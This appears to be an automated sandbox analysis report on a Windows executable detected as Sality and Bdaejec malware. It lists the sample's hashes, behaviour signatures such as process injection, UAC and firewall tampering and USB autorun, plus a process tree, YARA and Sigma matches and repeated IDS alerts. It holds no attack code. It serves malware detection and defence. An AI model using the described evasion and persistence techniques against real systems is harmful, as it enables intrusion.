Windows Analysis Report
#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe

Overview

General Information

Sample name: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
renamed because original name is a hash value
Original sample name: .exe
Analysis ID: 1467984
MD5: 99901509a53dfb9c77c1be4d60763afc
SHA1: 920a3553a48d9d11a3b02b61d50bcd564330e173
SHA256: 181695ba0cdd4904f94b59450af4022fb811da81f386dca90d439f7c66566c0b
Tags: exesality
Infos:

Detection

Bdaejec, Sality
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Bdaejec
Yara detected Sality
AI detected suspicious sample
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates autorun.inf (USB autostart)
Deletes keys which are related to windows safe boot (disables safe mode boot)
Disables UAC (registry)
Disables user account control notifications
Infects executable files (exe, dll, sys, html)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
May modify the system service descriptor table (often done to hook functions)
Modifies the windows firewall
Modifies the windows firewall notifications settings
PE file contains section with special chars
PE file has a writeable .text section
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

  • System is w10x64
  • #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe (PID: 7248 cmdline: "C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe" MD5: 99901509A53DFB9C77C1BE4D60763AFC)
    • YMZwp.exe (PID: 7348 cmdline: C:\Users\user\AppData\Local\Temp\YMZwp.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)
      • WerFault.exe (PID: 8140 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7348 -s 1624 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • fontdrvhost.exe (PID: 776 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • dllhost.exe (PID: 7480 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
    • fontdrvhost.exe (PID: 784 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
    • ShellExperienceHost.exe (PID: 7716 cmdline: "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca MD5: 9B8DE9D4EDF68EEF2C1E490ABC291567)
    • RuntimeBroker.exe (PID: 7944 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • sihost.exe (PID: 3400 cmdline: sihost.exe MD5: A21E7719D73D0322E2E7D61802CB8F80)
    • svchost.exe (PID: 3452 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • svchost.exe (PID: 3520 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • ctfmon.exe (PID: 3904 cmdline: "ctfmon.exe" MD5: B625C18E177D5BEB5A6F6432CCF46FB3)
    • explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
    • svchost.exe (PID: 4336 cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • StartMenuExperienceHost.exe (PID: 4812 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca MD5: 5CDDF06A40E89358807A2B9506F064D9)
    • RuntimeBroker.exe (PID: 4912 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • SearchApp.exe (PID: 5016 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca MD5: 5E1C9231F1F1DCBA168CA9F3227D9168)
    • RuntimeBroker.exe (PID: 4472 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • RuntimeBroker.exe (PID: 4852 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • smartscreen.exe (PID: 2780 cmdline: C:\Windows\System32\smartscreen.exe -Embedding MD5: 02FB7069B8D8426DC72C9D8A495AF55A)
    • ApplicationFrameHost.exe (PID: 6352 cmdline: C:\Windows\system32\ApplicationFrameHost.exe -Embedding MD5: D58A8A987A8DAFAD9DC32A548CC061E7)
    • WinStore.App.exe (PID: 6380 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca MD5: 6C44453CD661FC2DB18E4C09C4940399)
    • RuntimeBroker.exe (PID: 6676 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • TextInputHost.exe (PID: 6720 cmdline: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca MD5: F050189D49E17D0D340DE52E9E5B711F)
    • cscript.exe (PID: 5220 cmdline: "cscript" "C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS" /dstatus MD5: CB601B41D4C8074BE8A84AED564A94DC)
    • conhost.exe (PID: 5276 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: Sality

Description: F-Secure states that the Sality virus family has been circulating in the wild as early as 2003. Over the years, the malware has been developed and improved with the addition of new features, such as rootkit or backdoor functionality, and so on, keeping it an active and relevant threat despite the relative age of the malware.

Modern Sality variants also have the ability to communicate over a peer-to-peer (P2P) network, allowing an attacker to control a botnet of Sality-infected machines. The combined resources of the Sality botnet may also be used by its controller(s) to perform other malicious actions, such as attacking routers.

Infection

Sality viruses typically infect executable files on local, shared and removable drives. In earlier variants, the Sality virus simply added its own malicious code to the end of the infected (or host) file, a technique known as prepending. The viral code that Sality inserts is polymorphic, a form of complex code that is intended to make analysis more difficult.

Earlier Sality variants were regarded as technically sophisticated in that they use an Entry Point Obscuration (EPO) technique to hide their presence on the system. This technique means that the virus inserts a command somewhere in the middle of an infected file's code, so that when the system is reading the file to execute it and comes to the command, it forces the system to 'jump' to the malware's code and execute that instead. This technique was used to make discovery and disinfection of the malicious code harder.

Payload

Once installed on the computer system, Sality viruses usually also execute a malicious payload. The specific actions performed depend on the specific variant in question, but generally Sality viruses will attempt to terminate processes, particularly those related to security programs. The virus may also attempt to open connections to remote sites, download and run additional malicious files, and steal data from the infected machine.

Attribution:
  • Salty Spider
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.sality
No configs have been found
Source | Rule | Description | Author | Strings
C:\lwkdr.exe | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen
  • 0x14:$b1: yrf<[LordPE]
  • 0x210:$b2: Hello world!
C:\Users\user\AppData\Local\Temp\winxmkqo.exe | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen
  • 0x14:$b1: yrf<[LordPE]
  • 0x210:$b2: Hello world!

Source | Rule | Description | Author | Strings
00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Sality | Yara detected Sality | Joe Security
Process Memory Space: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe PID: 7248 | JoeSecurity_Sality | Yara detected Sality | Joe Security
Process Memory Space: YMZwp.exe PID: 7348 | JoeSecurity_Bdaejec | Yara detected Bdaejec | Joe Security

Source | Rule | Description | Author | Strings
6.3.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.8dcfe8.2.raw.unpack | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen
  • 0x14:$b1: yrf<[LordPE]
  • 0x210:$b2: Hello world!
6.2.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.24a2300.9.raw.unpack | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen
  • 0x1b7c:$s1: Simple Poly Engine v
  • 0x14:$b1: yrf<[LordPE]
  • 0x210:$b2: Hello world!
6.3.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.8c79b4.1.unpack | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen
  • 0x15648:$b1: yrf<[LordPE]
  • 0x15844:$b2: Hello world!
6.2.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.24a25f4.8.raw.unpack | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen
  • 0x1888:$s1: Simple Poly Engine v
6.3.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.872d5c.0.unpack | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen
  • 0x6a2a0:$b1: yrf<[LordPE]
  • 0x6a49c:$b2: Hello world!

        System Summary

        Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe", ParentImage: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, ParentProcessId: 7248, ParentProcessName: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3452, ProcessName: svchost.exe
        Source: Process started, Author: Michael Haag, Data: Command: "cscript" "C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS" /dstatus, CommandLine: "cscript" "C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS" /dstatus, CommandLine|base64offset|contains: )^, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: "C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe", ParentImage: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, ParentProcessId: 7248, ParentProcessName: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, ProcessCommandLine: "cscript" "C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS" /dstatus, ProcessId: 5220, ProcessName: cscript.exe
        Source: Registry Key set, Author: frack113, Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, ProcessId: 7248, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline
        Source: Process started, Author: vburov, Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe", ParentImage: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, ParentProcessId: 7248, ParentProcessName: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3452, ProcessName: svchost.exe
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:09.303762
        SID:2804830
        Source Port:49724
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:30.032193
        SID:2804830
        Source Port:49832
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:35.317999
        SID:2804830
        Source Port:49759
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:49.164275
        SID:2804830
        Source Port:49778
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:31.659976
        SID:2804830
        Source Port:49997
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:34.820235
        SID:2804830
        Source Port:49918
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:58.814550
        SID:2804830
        Source Port:63853
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:06.666109
        SID:2804830
        Source Port:49962
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:40.362555
        SID:2804830
        Source Port:49766
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:19.958289
        SID:2804830
        Source Port:49981
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:38.467559
        SID:2804830
        Source Port:50006
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:24.299488
        SID:2804830
        Source Port:49987
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:53.128186
        SID:2804830
        Source Port:49944
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:43.840428
        SID:2804830
        Source Port:49850
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:32.384198
        SID:2804830
        Source Port:49756
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:11.461784
        SID:2804830
        Source Port:49969
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:27.487510
        SID:2804830
        Source Port:49991
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:28.298626
        SID:2804830
        Source Port:49909
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:39.796014
        SID:2804830
        Source Port:49925
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:54.752862
        SID:2804830
        Source Port:49864
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:59.487756
        SID:2804830
        Source Port:49870
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:35.614319
        SID:2804830
        Source Port:49919
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:51.063459
        SID:2804830
        Source Port:49781
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:50.247950
        SID:2804830
        Source Port:49858
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:42.749015
        SID:2804830
        Source Port:49769
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:33.587885
        SID:2804830
        Source Port:50000
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:57.818703
        SID:2804830
        Source Port:49790
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:54.953451
        SID:2804830
        Source Port:50029
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:38.250500
        SID:2804830
        Source Port:49842
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:19.573920
        SID:2804830
        Source Port:49898
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:25.151668
        SID:2804830
        Source Port:49746
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:36.683929
        SID:2804830
        Source Port:49921
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:27.230078
        SID:2804830
        Source Port:49829
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:43.954296
        SID:2804830
        Source Port:49931
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:32.479378
        SID:2804830
        Source Port:49915
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:53.161826
        SID:2804830
        Source Port:50026
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:59.943341
        SID:2804830
        Source Port:49793
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:00:56.772122
        SID:2807908
        Source Port:49706
        Destination Port:799
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:18.242450
        SID:2804830
        Source Port:49817
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:00:56.566151
        SID:2838522
        Source Port:64650
        Destination Port:53
        Protocol:UDP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:12.970119
        SID:2804830
        Source Port:49810
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:04.022066
        SID:2804830
        Source Port:49715
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:03.152790
        SID:2804830
        Source Port:49797
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:47.290355
        SID:2804830
        Source Port:49775
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:16.152288
        SID:2804830
        Source Port:49734
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:20.999936
        SID:2804830
        Source Port:49740
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:22.866675
        SID:2804830
        Source Port:49823
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:32.227759
        SID:2804830
        Source Port:49835
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:29.573817
        SID:2804830
        Source Port:49752
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:14.792678
        SID:2804830
        Source Port:49813
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:56.506243
        SID:2804830
        Source Port:49789
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:43.122012
        SID:2804830
        Source Port:49849
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:12.187330
        SID:2804830
        Source Port:49970
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:31.881537
        SID:2804830
        Source Port:49755
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:46.468983
        SID:2804830
        Source Port:49853
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:17.914842
        SID:2804830
        Source Port:49736
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:31.349246
        SID:2804830
        Source Port:49834
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:10.546095
        SID:2804830
        Source Port:49807
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:56.645638
        SID:2804830
        Source Port:49867
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:44.740868
        SID:2804830
        Source Port:49772
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:37.226377
        SID:2804830
        Source Port:50004
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:21.234782
        SID:2804830
        Source Port:49900
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:00.275363
        SID:2804830
        Source Port:49871
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:50.302773
        SID:2804830
        Source Port:50022
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:07.791091
        SID:2804830
        Source Port:49722
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:58.613467
        SID:2804830
        Source Port:49791
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:58.540036
        SID:2804830
        Source Port:49952
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:05.352632
        SID:2804830
        Source Port:49719
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:45.815743
        SID:2804830
        Source Port:49934
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:03.001623
        SID:2804830
        Source Port:49957
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:53.166032
        SID:2804830
        Source Port:49862
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:38.741816
        SID:2804830
        Source Port:49843
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:10.370214
        SID:2804830
        Source Port:49885
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:48.869334
        SID:2804830
        Source Port:49938
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:39.564643
        SID:2804830
        Source Port:49765
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:13.080098
        SID:2804830
        Source Port:49730
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:49.406963
        SID:2804830
        Source Port:49939
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:02.183154
        SID:2804830
        Source Port:49956
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:06.146884
        SID:2804830
        Source Port:49961
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:22.519683
        SID:2804830
        Source Port:49984
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:06.776659
        SID:2804830
        Source Port:49880
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:18.335947
        SID:2804830
        Source Port:49896
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:15.590938
        SID:2804830
        Source Port:49975
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:09.581772
        SID:2804830
        Source Port:49966
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:56.042930
        SID:2804830
        Source Port:49948
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:06.807493
        SID:2804830
        Source Port:49802
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:52.887573
        SID:2804830
        Source Port:49784
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:12.789479
        SID:2804830
        Source Port:49888
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:28.559508
        SID:2804830
        Source Port:49993
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:35.314816
        SID:2804830
        Source Port:49839
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:05.551264
        SID:2804830
        Source Port:49878
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:47.376297
        SID:2804830
        Source Port:50018
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:25.987014
        SID:2804830
        Source Port:49827
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:48.377470
        SID:2804830
        Source Port:49777
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:11.167101
        SID:2804830
        Source Port:49808
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:12.546374
        SID:2804830
